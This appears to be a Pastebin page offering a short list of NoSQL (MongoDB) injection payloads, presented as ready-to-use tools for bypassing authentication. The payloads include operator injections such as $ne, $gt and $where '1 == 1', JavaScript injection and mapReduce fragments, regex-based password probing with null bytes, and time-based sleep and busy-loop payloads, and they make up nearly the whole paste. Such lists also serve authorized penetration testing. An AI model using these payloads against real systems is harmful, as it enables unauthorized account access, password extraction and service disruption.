Advertisement
MalwareFinder

NoSQL injection

May 6th, 2018
761
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.71 KB | None | 0 0
  1. NoSQL injection :D
  2. Payload to bypass NoSQL authentication ;)
  3. Modify as per your need ^_^
  4. thanks me later :)
  5.  
  6. { $ne: 1 }
  7. ', $or: [ {}, { 'a':'a
  8. ' } ], $comment:'MangoDB bypassed :D :D '
  9. db.injection.insert({success:1});
  10. db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
  11. || 1==1
  12. ', $where: '1 == 1'
  13. 1, $where: '1 == 1'
  14. ' && this.password.match(/.*/)//+%00
  15. ' && this.passwordzz.match(/.*/)//+%00
  16. '%20%26%26%20this.password.match(/.*/)//+%00
  17. '%20%26%26%20this.passwordzz.match(/.*/)//+%00
  18. {$gt: ''}
  19. [$ne]=1
  20. ';sleep(3000);
  21. ';sleep(3000);'
  22. ';sleep(3000);+'
  23. ';it=new%20Date();do{pt=new%20Date();}while(pt-it<3000);
  24. true, $where: '1 == 1'
  25. , $where: '1 == 1'
  26. $where: '1 == 1'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement